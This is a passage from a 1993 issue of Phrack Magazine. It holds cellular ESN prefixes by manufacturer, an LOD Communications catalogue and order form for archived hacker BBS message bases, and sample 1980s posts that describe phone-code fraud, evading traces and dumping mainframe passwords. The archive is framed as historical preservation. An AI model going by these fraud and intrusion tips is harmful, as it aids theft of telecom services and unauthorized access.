St. Louis, MO           017     046
St. Petersberg, FL      175     042
State College, PA       159     032
Stuebenville, OH        039     032
Stockton, CA            233     224
Stroudsburg, PA         103     172
Syracuse, NY            077     086
Tacoma, WA              047     006
Tallahassee, FL         565     544
Tampa, FL               175     042
Temple, TX              409     392
Terre Haute, IN         567     080
Texarkana, TX           229     550
Toledo, OH              021     130
Topeka, KS              059     552
Trenton, PA             029     008
Tucson, AZ              053     140
Tulsa, OK               111     166
Tuscaloosa, AL          577     098
Ukiah, CA               1075    ---
Utica, NY               235     226
Vallejo, CA             031     040
Victoria, TX            581     562
Vineland, NJ            583     250
Visalia, CA             153     162
Waco, TX                587     566
Warren, OH              089     126
Washington, DC          013     018
Waterloo, IA            589     568
Wausau, WI              591     570
West Palm Beach, FL     037     024
Wheeling, WV            039     032
Wichita Falls, TX       595     574
Wichita, KS             165     070
Wilkes Barr, PA         103     172
Williamsport, PA        103     576
Wilmington, DE          123     008
Wilmington, NC          599     578
Winston-Salem, NC       095     142
Worcester, MA           007     028
Yakima, WA              601     580
York, PA                159     096
Youngstown, OH          089     126
Yuba City, CA           129     112


ESN PREFIXES BY MANUFACTURER

Manufacturer                    Decimal         Hex

Alpine Electronics              150             96
AT&T                            158             9E
Audiovox-Audiotel               138             8A
Blaupunkt                       148             94
Clarion Company                 140             8C
Clarion Manufacturing Co.       166             A6
CM Communications               153             99
Di-Bar Electronics              145             91
E.F. Johnson                    131             83
Emptel Electronics              178             B2
Ericsson                        143             8F
Ericsson GE Mobile              157             9D
Fujitsu                         133             85
Gateway Telephone               147             93
General Electric                146             92
Goldstar Products               141             8D
Harris                          137             89
Hitachi                         132             84
Hughes Network Systems          164             A4
Hyundai                         160             A0
Japan Radio Co., Ltd.           152             98
Kokusai                         139             8B
Mansoor Electronics             167             A7
Mobira                          156             9C
Motorola                        130             82
Motorola International          168             A8
Mitsubishi                      134             86
Murata Machinery                144             90
NEC                             135             87
Nokia                           165             A5
Novatel                         142             8E
OKI                             129             81
Panasonic (Matsushita)          136             88
Philips Circuit Assemblies      171             AB
Philips Telecom                 170             AA
Qualcomm                        159             9F
Samsung Corp.                   176             B0
Sanyo                           175             AF
Satellite Technology Services   161             A1
Shintom West                    174             AE
Sony Corp.                      154             9A
Tama Denki Co.                  155             9B
Tecnhophone                     162             A2
Uniden Corp. of America         172             AC
Uniden Corp. of Japan           173             AD
Universal Cellular              149             95
Yupiteru Industries             163             A3


Manufacturers' Addresses

Alpine Electronics of America
191456 Gramercy Place
Torrance, CA 90501
310-326-8000

Antel Corporation
400 Oser Avenus
Hauppauge, NY 11788
516-273-6800

AT&T Consumer Products
5 Woodhollow Drive
Parsippany, NJ 07054
201-581-3000

Audiovox Corp.
150 marcus Blvd.
Hauppauge, NY 11788
516-231-7750

Blaupunkt
Robert Bosch Corp.
2800 S. 25th Avenue
Broadview, IL 60153
708-865-5200

Clarion Corp. of America
661 W. Redondo Beach Blvd.
Gardena, CA 90247
310-327-9100

DiamondTel
Mitsubishi Electronics of America
800 Biermann Court
Mt. Prospect, IL 60056
708-298-9223

Ericsson
P.O. Box 4248
Lynchburg, VA 24502
800-CAR-FONE

Fujitsu America, Inc.
2801 Telecom Parkway
Richardson, TX 75082
214-690-9660

GE Mobile Communications
P.O. Box 4248
Lyunchburg, VA 24502
800-CAR-FONE

GoldStar
1850 W. Drake Drive
Tempe, AZ 85283
602-752-2200

Hughes Network Systems
11717 Exploration Lane
Germantown, MD 20876
301-428-5500

Kenwood USA Corp.
2201 E. Dominguez Street
Long Beach, CA 90810
310-639-9000

Mitsubishi International
1500 Michael Drive, Suite B
Wood Dale, IL 60191
708-860-4200

Motorola, Inc.
1475 W. Shure Drive
Arlington Heights, IL 60004
708-632-5000
800-331-6456

Muratec
5560 Tennyson Parkway
Plano, TX 75024
214-403-3300

NEC America, Inc.
Mobile Radio Division
383 Omni Drive
Richardson, TX 75080
214-907-4000

Nokia Mobile Phones
2300 Tall Pines Drive, Suite 120
Largo, FL 34641
813-536-5553

NovAtel
P.O. Box 1233
Fort Worth, TX 76101
817-847-2100

OKI Telecom
437 Old Peachtree Road
Suwanee, GA 30174
404-995-9800

Omni Cellular
96 S. Madison Street
Carthage, IL 62321
217-357-2308

Panasonic Communications
Two Panasonic Way
Secaucus, NJ 07094
201-348-7000

Panasonic Company
One Panasonic Way
Secaucus, NJ 07096
201-348-9090

Pioneer Electronics
2265 E. 220th Street
Long Beach, CA 90810
310-835-6177

Sanyo
21350 Lassen Street
Chatsworth, CA 91311
800-421-5013
818-998-7200

Shintom West
20435 South Western Avenue
Torrance, CA 90501
310-328-7200

Sony Corp. of America
Sony Drive
Park Ridge, NJ 07656
201-930-1000

Tandy Corp.
700 One Tandy Center
Fort Worth, TX 76102
817-390-3300

Technophone Corp.
1801 Penn Street, Suite 3
Melbourne, FL 32901
407-952-2100

Uniden America Corp.
4700 Amon Carter Blvd.
Fort Worth, TX 71655
817-858-3300

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 18 of 27

      The LOD Communications Underground H/P BBS Message Base Project:
     Price Listing of Currently Available Message Bases and Order Form.
                    Holdings List Version #1, 5/15/93


   This file contains:

     - Background information on the project;
     - Currently completed message bases with prices; and,
     - Order form and stipulations.

   If you have already seen some of the background information contained in the
following paragraphs, note that additional information has been added.  The aim
was to make this file as self-contained as possible.  It is approximately seven
pages in length (23K) and it should answer all of your questions.


The Project:
------------

   Throughout history, physical objects have been preserved for posterity for
the benefit of the next generation of humans.  Cyberspace, however, isn't very
physical; data contained on floppy diskettes has a finite lifetime as does the
technology to retrieve that data.  The earliest underground hacker bulletin
board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s
were state-of-the-art.  Today, it is difficult to find anyone who has one of
these machines in operating condition, not to mention the brain cells left to
recall how to operate them. :-(

   LOD Communications has created a historical library of the "dark" portion of
Cyberspace.  The project's goal is to acquire as much information as possible
from underground Hack/Phreak (H/P) bulletin boards that were in operation
during a decade long period, dating from the beginnings (in 1980/81 with 8BBS
and MOM:  Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of
Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90.
Currently, messages from over 50 different BBSes have been retrieved, although
very few message bases are 100% complete.  However, not having a complete "set"
does not diminish their value.


Who Benefits From This Information?:
------------------------------------

     - PARTICIPANTS who were on the various H/P BBSes may want to see their
       contribution to history or reminisce about the "golden era" of hacking;

     - ENTHUSIASTS who came into the "scene" after most of these boards were
       down may want to see what they missed;

     - COMPANIES who may want to see if their (or their competitors') phone
       systems, computers, or networks were compromised;

     - SECURITY PROFESSIONALS/LAW ENFORCEMENT who may want to see what
       techniques were used to subvert computer security systems;

     - SCHOOLS AND UNIVERSITIES (including their libraries) who may want to use
       the information for research in sociology or computer science as well as
       for educational purposes in courses such as Computer Law, Computer
       Ethics, and Computer Security;

     - AUTHORS/PRESS who may want to finally get the facts straight about
       "hackers;" and,

     - THE CURIOUS PUBLIC who may want to sneak a peek into the inner realm of
       the Computer Underground, especially those Restricted Access BBSes and
       their Private sub-boards where only a small handful of "the best"
       resided.

   Were the individuals involved in the Computer Underground out to start World
War III, selling secrets to the Soviets, working with organized crime,
conspiring to do evil, or just a bunch of bored teenagers with nothing better
to do?  How much did they know, and how did they find it out?  Did they have
the capability to shut down phone service of Area Code portions?  Could
they ruin someone's credit?  Could they "move satellites in the heavens?"
Could they monitor packet switching network conversations or YOUR
conversations?  The answers lie within the messages themselves.


Why is LODCOM Charging Money For The Message Bases?:
----------------------------------------------------

   As happens with most projects, the effort and monetary investment turned out
to be substantially more than originally anticipated.  With all of the high-
tech equipment available today, people sometimes forget that in the early
1980s, 14.4K baud modems and 250 MB hard drives were just a fantasy for the
home computer user.  Most messages Lodcom has recovered were downloaded at 300
baud onto 143K disk drives, with each file usually no larger than 15K in size.
One could not call a BBS and download the complete message base in 10 minutes
and save it into one file.  Literally hundreds of man-hours have been spent
copying dusty Apple ][ disks, transferring them to IBM (or typing in hard copy
versions when electronic versions were unavailable), organizing over one
thousand individual files (thus far) according to what BBS the messages were
originally posted on, and splicing the files together.  Also, after consulting
with the appropriate civil liberties organizations and our own legal counsel,
a slight editing of the messages (restricted to long distance access codes,
phone numbers, and computer passwords) had to be made to ensure that there is
nothing illegal contained within the messages.  Every effort was made to keep
the messages in their pristine condition:  40 columns, ALL CAPS, spelling
errors, offensive language, inaccuracies of various kinds, and ALL.

   Although a fairly comprehensive collection of the goings-on during a decade
of public and private computer underground activity has been accomplished,
there are more messages out there.  It is our wish to continue to document the
History of the Computer Underground.  In order to do this, and in order to
break even on what resources have already been expended (it is a LOT more than
most people realize), a dollar value has been attached to each set of message
bases.  The dollar values were kept as low as possible and range from $1.00 to
$8.00 for each H/P BBS Message Base Set.  Without your understanding and
support, this effort may not be able to sustain itself long enough to complete
the project.  A large portion of any profits will be recycled for two other
projects in the works, whose aim is to provide additional historical background
on the Computer Underground Community.  That is, no one involved is quitting
their day job :-)

   One additional note:  For those who purchase the Metal Shop Private Message
Base, 100% of the price ($4.00) will be donated to help pay for Craig Neidorf's
(Knight Lightning) Legal Defense bills (due to his successful campaign to
protect First Amendment rights for electronic publishing, i.e. the PHRACK/E911
case).


How The Prices Were Determined:
-------------------------------

Prices were determined based on the following considerations:

     - The number of years ago that the BBS operated (affected availability);

     - The total number of messages compiled (required more time to compile);

     - Its popularity and message content (anticipated demand);

     - Whether the BBS or portions thereof were deemed "elite" and, therefore,
       restricted access to a small number of users (affected availability);
       and,

     - An additional factor to account for overhead costs such as diskettes,
       diskette mailing containers, postage, time to fill orders, etc.


What Each "Message Base File" Contains:
---------------------------------------

     - A two page general message explaining H/P BBS terminology and format.

     - The BBS Pro-Phile:  A historical background and description of the BBS
       either written by the original system operator(s) or those who actually
       called the BBS when it was in operation (it took months to track the
       appropriate people down and get them to write these specifically for
       this project; lesser known BBSes may not contain a Pro-Phile);

     - Messages posted to the BBS (i.e. the Message Base);

     - Downloaded Userlists if available; and

     - Hacking tutorials a.k.a. "G-Philes" that were on-line if available.


   It is anticipated that most people who are interested in the message bases
have never heard of a lot of the BBS names shown in the listing.  If you have
seen one set of messages, you have NOT seen them ALL.  Each system had a unique
personality, set of users, and each has something different to offer. If you
decide to order the minimum, we recommend that you mix a high-priced base
($7.00 or above) with a couple of medium-priced bases ($4.00 to $6.00) and a
few lower-priced bases ($1.00 to $3.00).  This will provide you with a feel for
what was happening over a broad range of years and message quality.  Of course,
nothing beats the full set (offered at a discount, see order form).

Formats the Message Base Files are Available in:
------------------------------------------------

   Due to the large size of the Message Base Files, they will be compressed
using the format of your choice.  Please note that Lodcom does NOT include the
compression/decompression program (PKZIP, PAK, etc.).  ASCII (decompressed)
files will be provided for $2.00 extra to cover additional diskette and
shipping costs.  The files are available for:

     - IBM (5.25 or 3.5 inch)
     - AMIGA (3.5 inch)
     - APPLE MACINTOSH (3.5 inch)
     - PAPER versions can be ordered but cost triple (due to increased shipping
       costs, time to print order, and messages being in 40 column format and
       therefore wasting lots of paper...save those trees!).  Paper versions
       take twice the time to deliver but are laser printed.

Orders are expected to arrive at the requesters' physical mail box in 2-4
weeks upon receipt of the order.


FAQs (Frequently Asked Questions):
----------------------------------

   QUESTION:  How long will these Message Base Files be available?

   ANSWER:  We cannot say for sure.  This is an ongoing effort and your support
            will allow us to continue until we are satisfied with having
            recovered the last decent scraps of messages out there.  Assuming
            there is a demand for these messages, all H/P BBSes of WORTH (i.e.
            NON-"codez" and NON-"warez" systems) are expected to be offered by
            the end of the Summer of 1993.  A Guesstimate of what will be
            offered is 80 to 100 Message Bases, half of which will be rather
            partial.  Orders are expected to be filled up until the end of 1993
            although this may change.  Regardless, we will send out
            notification well in advance of ceasing operations.

   QUESTION:  "Can I help out?  I have some old messages" (either on a C64,
              Apple, IBM [best for us], or printout).

   ANSWER:  Contact us ASAP!  We will work out an equitable agreement depending
            on the quantity, quality, format, and "ancientness" of the
            messages.  Your contribution will not go unrecognized.

   QUESTION:  Say if I purchase BBS "X" which has 100 messages and the next
              Version of your Price Listing shows BBS "X" now has 200 messages,
              do I have to pay the for the first 100 all over again if I want
              the other 100 messages?

   ANSWER:  No.  If a small number of additional messages are added, they will
            be sent for the price of a diskette and postage only, i.e. the
            information will be free.  If a larger number such as 100 new
            messages are added, then if you previously purchased the message
            base, the additional messages will be discounted.  Those who pay
            the Commercial Rate (corporations, government, etc.) will receive
            updates of the purchased Volume for FREE regardless of how many new
            messages there are, and LODCOM also pays for the postage and
            diskette(s).

   QUESTION:  What if I purchase the minimum order now and, when the next
              Version of the price list is released, I want to get more Message
              Bases?  Do I have to still pay the $20.00 minimum?

   ANSWER:  No.  If you are a previous customer, the minimum is cut in half,
            that is, $10.00.  Commercial customers who bought Volume #1 (the
            current "Complete Set"), are obviously not obligated to purchase
            the added Message Bases (the next Volume).

   QUESTION:  I would really like to get a feel for what one or two of the
              boards were like before I order them.  Can I get more info?

   ANSWER:  Yes.  A Sample of Actual Messages is available by performing the
            following, so long as you have TELNET access to the Internet:

   Telnet to:  198.67.3.2      [IP Address for PHANTOM.COM]
   Type:       mindvox         [To enter the Mindvox system]
   login as:   guest           [To look around]
   At prompt:  finger lodcom   [To see our Sample Messages File]

   If you do not have TELNET access to the Internet, AND your host will NOT
"bounce" a 50K file, Lodcom will send you the Sample Messages File if you
specifically request it.


The Price List:
---------------

 LOD Communications (c) 1993: Price List of Hack/Phreak BBS Message Bases
 ----------------------------------------------------------------------------
 BBS NAME           A/C  SYSOP(S)        # MSGS   DATES      KBYTES   PRICE
 ----------------------------------------------------------------------------
 Alliance BBS       618  Phantom Phreaker  113    2/09/86 -   215    $ 3.00 B
                         Doom Prophet      G,P    6/30/86

 Black Ice Private  703  The Highwayman    880    12/1/88 -   580    $ 7.00 B
                                           P,U    5/13/89

 Broadway Show/     718  Broadway Hacker   180    9/29/85 -   99     $ 3.00 B
 Radio Station BBS                                12/27/85

 CIA BBS            201  CIA Director      30     5/02/84 -   30     $ 1.00
                                                  6/08/84

 C.O.P.S.           305  Mr. Byte-Zap      227    11/5/83 -   196    $ 4.00 B
                         The Mechanic      G,R,U  7/16/84

 Face To Face       713  Montressor        572    11/26/90 -  400    $ 2.00 B
                         Doc Holiday *            12/26/90

 Farmers Of Doom    303  Mark Tabas        41     2/20/85 -   124    $ 2.00 B
                                           G      3/01/85

 Forgotten Realm    618  Crimson Death     166    3/08/88 -   163    $ 3.00 B
                                                  4/24/88

 Legion Of Doom!    305  Lex Luthor        194    3/19/84 -   283    $ 6.00 B
                         Paul Muad'Dib *   G,P,U  11/24/84

 Metal Shop Private 314  Taran King        520    4/03/86 -   380    $ 4.00 BD
                         Knight Lightning  P,R,U  5/06/87

 OSUNY              914  Tom Tone          375    7/9/82 -    368    $ 8.00 B
                         Milo Phonbil *    G,U    4/9/83

 Phoenix Project    512  The Mentor        1118   7/13/88 -   590    $ 4.00 B
                         Erik Bloodaxe *   G,R    2/07/90

 Plover-NET         516  Quasi Moto        346    1/14/84 -   311    $ 5.00 B
                         Lex Luthor *      G      5/04/84

 Safehouse          612  Apple Bandit      269    9/15/83 -   251    $ 4.00 B
                                           G,U    5/17/84

 Sherwood Forest I  212  Magnetic Surfer   92     5/01/84 -    85    $ 2.00 B
                                           P,U    5/30/84

 Sherwood Forest ][ 914  Creative Cracker  100    4/06/84 -    239   $ 3.00 B
                         Bioc Agent 003 *  G      7/02/84

 Split Infinity     408  Blue Adept        52     12/21/83 -   36    $ 1.00 B
                                                  1/21/84

 Twilight Phone     ???  System Lord       17     9/21/82 -    24    $ 1.00
                                                  1/09/83

 Twilight Zone/     203  The Marauder      108    2/06/85 -   186    $ 3.00 B
 Septic Tank             Safe Cracker *    G,U    7/24/86

 WOPR               617  Terminal Man      307    5/15/84 -   266    $ 6.00 B
                         The Minute Man *  G,U    1/12/85
 _____________________________________________________________________________

NOTES:  In SYSOP(S) column, * indicates remote sysop.

        In #msgs column, P indicates that the BBS was Private, R indicates BBS
        was public but restricted access sub-board(s) are included, G indicates
        that SOME (or maybe all) of the G-files written by the sysop and/or
        files that were available on the BBS are included, U indicates that a
        BBS Userlist (typically undated) is included.

        DATES column shows the starting and ending dates for which messages
        were buffered (and therefore available) although there may be some gaps
        in the chronological order.

        KBYTES column shows size of complete file containing messages, g-files,
        userlist, etc.  COST column indicates current cost of message base in
        U.S. Dollars, "B" indicates that a "BBS Pro-Phile" was written and is
        included, "D" indicates that 100% of all orders for that BBS (Metal
        Shop Private) will be donated to help pay for Craig Neidorf's (Knight
        Lightning) Legal Defense bills.

LODCOM is currently organizing and splicing messages from over 30 more H/P
BBSes [shown below] and, as the files are completed and/or as additional
messages are procured for the above systems, updates of this listing will be
released.  Next release is expected some time in JUNE of 1993: Modem Over
Manhattan (MOM), 8BBS (213), Mines of Moria (713), Pirates Cove (516) sysop:
BlackBeard, Catch-22 (617) sysop: Silver Spy, Phreak Klass 2600 (806) sysop:
The Egyptian Lover, Blottoland (216) sysop: King Blotto, Osuny 2 (a.k.a. The
Crystal Palace) (914), The Hearing Aid, Split Infinity (408), (303) sysop: The
ShadowMaster, ShadowSpawn (219) sysop: Psychic Warlord, IROC (817) sysop: The
Silver Sabre, FreeWorld II (301) sysop: Major Havoc, Planet Earth, Ripco (312)
sysop: Dr. Ripco, Hackers Heaven (217) sysop: Jedi Warrior, Demon Roach
Underground (806) sysop: Swamp Ratte, Stronghold East Elite (516) sysop: Slave
Driver, Pure Nihilism, 5th Amendment (713) sysop: Micron, Newsweek Elite (617)
sysop: Micro Man, Lunatic Labs (415) sysop: The Mad Alchemist, Laser Beam
(314), Hackers Den (718) sysop: Red Knight, The Freezer (305) sysop: Mr. Cool,
The Boca Harbour (305) sysop: Boca Bandit, The Armoury (201) sysop: The Mace,
Digital Logic's Data Center (305) sysop: Digital Logic, Asgard (201), The KGB,
Planet Earth (714), PBS (702), Lost City of Atlantis sysop: The Lineman, and
more.


Hacking/Phreaking Tutorials a.k.a. "G-Philes":
----------------------------------------------

   Along with the above H/P BBS Message Bases, LODCOM has collected many of the
old "philes" that were written and disseminated over the years.  A list of all
of them would take up too much space here, however, we can tell you that the
majority are NOT files that were originally written for electronic newsletters
such as Phrack, PHUN, ATI, etc. (with the perhaps obvious exception of the
LOD/H Technical Journal).  Those files/newsletters are readily available from
other sources.  This hodgepodge of files includes files from Bioc Agent 003,
Legion of Doom members, and many others that somehow fell out of widespread
circulation.  A Table of Contents of the collection is included but the
tutorials are all grouped together in four large files of approximately 250K
each.  This collection will have additions with each update of this file.  See
the order form for the price (price will go up as more files are added).


The Order Form:
---------------

- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -

               LOD Communications H/P BBS Message Base ORDER FORM
               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   PERSONAL RATE:  Due to the economics involved in diskettes, disk mailing
containers, snail mail costs, and time to fill orders, a MINIMUM ORDER of
$20.00 is required for all personal requests.  If all 20 message bases are
ordered (containing 5700+ messages), the cost is discounted to $39.00; if you
order $20.00 worth (the minimum) or more, you get $5.00 worth in addition as a
discount.  That is, pay for $20.00 and get $25.00 worth of message bases.

   COMMERCIAL RATE:  Corporations, Universities, Libraries, and Government
Agencies must order the complete set (Volume #1) and pay a higher rate.  For
Price Listing Version #1 Released 5/15/93 (20 boards total), the price is
$99.00 (note that new messages that surface for any BBS purchased will be sent
completely FREE of ANY additional charge).

H/P BBS Names:   ____________________________________________________________

[Write: COMPLETE ____________________________________________________________
 SET if you want
 all messages]   ____________________________________________________________


"G-Phile" Collection Version #1 (Optional): $____________ ($10.00 Personal)
                                                          ($25.00 Commercial)

Disk Format/Type of Computer: _____________________________________
(Please be sure to specify diskette size [5.25" or 3.5"] and high/low density)

File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________
                    (ASCII [Non-Compressed] add $2.00 to order)

Texas Residents add 8% Sales Tax.
If outside North America please add $5.00 for Shipping & Handling.

Total Amount (In U.S. Dollars): $ ___________

Payment Method:  Check or Money Order please.
Absolutely NO Credit Cards, even if it's yours :-)

By purchasing these works, the Purchaser agrees to abide by all applicable U.S.
Copyright Laws to not distribute or reproduce, electronically or otherwise, in
part or in whole, any part of the Work(s) without express written permission
from LOD Communications.

Send To:
          Name: _____________________________________

  Organization: _____________________________________ (If applicable)

        Street: _____________________________________

City/State/Zip: _____________________________________

       Country: _____________________________________

E-mail address: _____________________________________ (If applicable)


PRIVACY NOTICE:  The information provided to LOD Communications is used for
sending orders and periodic updates to the H/P BBS Message Base Price List.
It will NOT be given or sold to any other party.  Period.

- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -

Remit To:   LOD Communications
            603 W. 13th
            Suite 1A-278
            Austin, Texas USA  78701

Lodcom can also be contacted via E-mail:  lodcom@mindvox.phantom.com
                             Voice Mail:  512-448-5098
 _____________________________________________________________________________
 End Order File V.1

LOD Communications: Leaders in Engineering, Social and Otherwise ;)

Email: lodcom@mindvox.phantom.com
Voice Mail: 512-448-5098
Snail Mail: LOD Communications
            603 W. 13th
            Suite 1A-278
            Austin, Texas USA 78701


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 19 of 27

                Lodcom Sample Messages Set #1, 4/20/93
 
   In order to provide a better feeling for the content of what the LOD
Communications Underground Hack/Phreak BBS Message Base Archives contain, 31
messages were selected from the overall collection of posts for 5 Boards.
Note that the samples contained herein are fairly typical and are but a very
small fraction of the 5000+ messages from over 50 systems that LODCOM currently
possesses. Additional BBS's and messages are being added constantly. Consult
the Price Listing [First Version due to be released in Late April 1993 and
periodic additions thereafter] for an up-to-date catalog of our holdings and
costs (minimal).
 
 
   The selection of messages in Set #1 are from the following Systems:
                                                           
   H/P BBS Name        A/C   Sysop(s)                           Circa
-----------------------------------------------------------------------------
   OSUNY               914   Tom Tone & Milo Phonbil            1982/83
   WOPR                617   Terminal Man & The Minute Man      1984/85         
   Phoenix Project     512   The Mentor & Erik Bloodaxe         1988/89/90
   The Twilight Zone   203   The Marauder & SafeCracker         1985/86
   Black Ice Private   703   The HighwayMan & The Mentor        1988/89
_____________________________________________________________________________   
              
 
H/P BBS Message Bases to be available in the near future (in addition to
the above five) are:
 
8BBS (213) Circa 1980/81, Modem Over Manhattan (MOM), Twilight Phone (1982), 
Legion of Doom! (305) sysop: Lex Luthor, Plover-NET (516) sysop: Quasi Moto,
Sherwood Forest II (914) co-sysop: Bioc Agent 003, Alliance BBS (618) sysop:
Phantom Phreaker, Catch-22 (617) sysop: Silver Spy, Blottoland (216) sysop:
King Blotto, Osuny 2 (aka The Crystal Palace) (914), Mines of Moria (713),
Pirates Cove (516) sysop: BlackBeard, The Hearing Aid, Split Infinity (408),
Farmers of Doom! (303) sysop: Mark Tabas, Shadowland (303) sysop: The
ShadowMaster, Metal Shop Private (314) sysops: Taran King and Knight Lightning,
ShadowSpawn (219) sysop: Psychic Warlord, IROC, FreeWorld II (301), Planet
Earth (714), The C.O.P.S. (305), Ripco (312) sysop: Dr. Ripco, Hackers Heaven
(217) sysop: Jedi Warrior, Demon Roach Underground, Stronghold East Elite (516)
cosysop: Slave Driver, Pure Nihilism, 5th Amendment (713), Newsweek Elite
(617), Phreak Klass 2600 (806), Lunatic Labs (415), Laser Beam (314), Hackers
Den, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca
Bandit, The Armoury (201) sysop: The Mace, Digital Logic (305), Asgard (201),
The CIA bbs, The KGB bbs, Face to Face (1990), Broadway Show (718) Sysop:
Broadway Hacker, The Safehouse (612) circa 1983/4, Lost City of Atlantis (215),
The Private Sector (2600 sponsor BBS), and more.
 
 
This message constitutes explicit Permission by LOD Communications to
disseminate this File containing 31 actual messages from our Copyrighted
(c) 1993 collection of H/P BBS Message Bases so long as the contents are not
modified. No part of this File may be published in print without explicit
permission by Lodcom.
 
 
                      Lodcom Sample H/P BBS Messages:
                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
*** {OSUNY (914) Sysop(s): Tom Tone and Milo Phonbil (both wrote for TAP)} ***
    *** {Osuny is perhaps the most legendary Phreak Board of all time} ***  
 
 Msg.:118 
 Date:10/5/82 
 From:MILO PHONBIL
   To:ALL
About:STANFORD STUFF
 
Greetings, Stanford phreaks! 
  
   It seems that those "strange" numbers
 are really ones that 
will appear if another person is signed 
on to the same id. 
(Like AA.TEG AA.TEG#2 AA.TEG#3 and so on
.) Also, while there 
is no MAIL facility available to "GUEST"
 accounts, there is 
a way to send a one-liner to someone els
e. The command format 
is:  TO gg.uuu msg   
Where gg.uuu is the person's id, and the
 msg is of course, 
the message. Also, their SPIRES database
 is quite 
interesting! Type CALL SPIRES, then SHOW
 SUBFILES. Then you 
must SELECT a subfile. For a complete tu
torial, try: 
TUTORIAL MASTERLIST 
SPIRES is ended by typing EXIT at the ->
 prompt. 
  
Later, MILO PHONBIL 
 
 
 
Msg.  :180  
About :MAINFRAMES
>From  :DATA BANDIT
To    :ALL PHREAKS
Date  :2/23/83  00:00
 
OK PHREAKS....YOU NEED HELP ON TSO
FORMATS,SPF FORMATS,GDDM FORMATS?
THIS IS THE GUY TO ASK....I'M DAMN
GOOD AT IT...I WORK AS AN OPERATOR
ON SUCH SYSTEMS AND KNOW THESE BABIES
LIKE I KNOW MY OWN FACE....SO IF YOU
NEED HELP...JUST DROP ME A LINE HERE
OR ON MY BOARD....303-xxx-3015....
24 HRS.....I CAN SHOW YOU HOW TO SET
UP A PROGRAM ONCE ON IT TO DUMP ALL
SYSTEM PASSWORDS AND ALL DATASET
PASSWORDS...ETC...SET UP YOURT
OWN USER ID...THE WHOLE 9 YARDS...
I HAVE MY COMPANY BY THE F*CKING
BALLS! SO I CAN TEACH YOU TOO....
JUST ASK ME.....
   
        THE ONE AND ONLY
           DATA BANDIT
           ][][ ][][][
  
   ON A MAINFRAME NEAR YOU!
 
 
---------------\-/-----------------
                ?
 
MEMBER P.H.A.
 
 
Msg.  :396  
About :PHREAK BBS ON THE SOURCE!!!
>From  :MAXWELL WILKE
To    :ALL
Date  :3/25/83       
 
Well, believe it or not, there is alread
y two small phreak
BBS's on The Source!!!  They have traded
 some minor info,
including some Sprint codes, and other s
uch folly.  But
the thing is, it's there, has been there
 since october '82,
and The Source knows about it, and they 
don't care!
the BBS's are on the Source's PARTIcipat
e, which, admitedely,
is a very large, powerful "thing."  In a
ddition to the
two on there now, I took the liberty to 
create my own, entitled
the "P-MENU.SAV GROUP".  It is Conferenc
e # 83.3257 .
 
Any CompuServe conference members out th
ere interested in
moving over to PARTIcipate on The Source
, let me know.
If you do not have instructions on it, I
'll mail 'em to you
if you give me your address.  I'll see w
hat I can do about
getting some more Source accounts.  A fr
iend of mine
listed 'em all!  
 
                    later,
                      MW
 
P.S.  To all fans of my modifications to
 The Source:
      Sorry, the good 'ole boys at STC p
icked up on what
      i did to them (Snicker... haw.. ha
w) and they cor- 
      rected my modifications.  i put 'e
m back, and they
      fixed 'em again, etc, etc, until t
hey finally looked
      up in their PR1MENET REFERENCE MAN
UAL and figured out
      how to protect their accounts!  Oh
 well...
 
 
Msg.  :476  
About :BAD NEWS
>From  :THE HACKER
To    :ALL
Date  :4/8/83        
 
BAD NEWS SPRINT IS AT IT AGAIN THEY JUST CAUGHT SOMEONE
LAST NIGHT NOW THEY ARE GOING FOR A SECOND KILL 
THEY ARE GOING AFTER ZERO PAGE THEY HAVE BEEN CALLING AROUND
ABOUT SO IF ANYONE OUT THERE KNOWS HIM TELL HIM THAT
THEY ARE CALLING AROUND NOW THAT SPRINT AND MCI ARE OUT TO GET
ALL OF THE PHREAKS DOES ANYONE HAVE ANY GOOD SERVICES THAT
ARE SAFE I AM USING ITT
HOW SAFE IS THAT???
 
PLEASE RESPOND BACK SOMEBODY!
 
 
                        THE
                          HACKER
 
       [*]THE INNER CIRCLE[*]
          =-=-=-=-=-=-=-=-
 
 
Msg.  :519  
About :SPRINT/MCI/OTHER BUGGERS
>From  :ROGER OLSON
To    :ALL
Date  :4/17/83       
 
I highly recommend the proceedure mentio
ned here earlier for
staying OUT OF TROUBLE with "the competi
tion". Look for your
own passwords. Don't use the ones posted
 on BBS's except maybe
once, to "get a feel" of how the particu
lar switch works. If
possible, test the codes between 8 - 11 
AM to detirmine if they
are business codes or not. When possible
, use a local loop to
call into/out of to the switch you are u
sing. This simply adds
more frustration in the event anyone is 
tracing. When possible,
STAY AWAY completely from these OCC's, o
pting instead to use the
Wats lines from large companies, via the
ir remote call in ports.
You always want to stay away from system
s that individually 
account for each call, as MCI/Sprint do.
 WATS lines, on the
other hand, especially in older exchange
s, do not record every
number called - just the total time the 
line was in use, in
hours per month. In either case....have 
your phun now!! Cause
after the Final Judgement and Settlement
 is implemented next
year, you will place <<all>> long distan
ce calls by merely
dialing the number desired, and entering
 a two digit "choice
of carrier" code (for ATT, MCI, Sprint, 
Allnet, etc) and your
local central office will use ANI to sup
ervise your call! The
outfits like MCI will discontinue dealin
g with the public as
such, and will only deal <with other tel
ephone companies> who
in turn will act like billing/collection
 agents for MCI, etc.
Watch and see! The times are changing! N
o more phucking around!
 
 
 
 Msg.:  211 
 Date: 10/17/82
 From: ROBERT ALLEN
   To: ALL
About: WHITE HOUSE
 
IF ANY OF  YOU ARE WONDERING,
800-424-9xxx IS WHAT IS 
KNOWN AS THE WHITE HOUSE SIGNAL (SWITCH
BOARD), 
AND IT IS RELATIVELY NASTY/FUN, IF ONE 
KNOWS ALL OF THE 
SILLY CODEWORDS TO USE.. A FRIEND AND 8 
OTHER PHREAKS 
GOT TRICKY DICK OUT OF BED AT 2:30 AM, 
